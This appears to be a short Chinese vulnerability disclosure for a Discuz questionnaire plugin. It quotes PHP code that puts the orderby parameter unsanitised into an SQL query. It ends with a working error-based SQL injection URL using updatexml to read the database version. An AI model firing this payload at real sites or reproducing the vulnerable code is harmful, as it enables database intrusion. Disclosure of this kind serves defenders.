Discuz问卷调查专业版插件注入

nds_ques_viewanswer.inc.php

<?PHP

if(!defined('IN_DISCUZ')) {
        exit('Access Denied');
}
   !empty($_G['gp_srchtxt'])? $wherestr .= " AND  author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " :'' ;
    $orderby = $_G['gp_orderby']? $_G['gp_orderby']:'dateline';//获取参数
    $imes = $_G['gp_imes']? $_G['gp_imes']:'DESC';
    $questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");
    $sysmode = $questopics['ques_mode'];
           ....
                $magiccount =  DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);
                   $multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);
                $topiclist = '';
                $nid = $start_limit+1;
        $query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr."  ORDER by $orderby $imes LIMIT $start_limit,$perpage");//带入查询
....

?>

测试方式:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--

sql

发表评论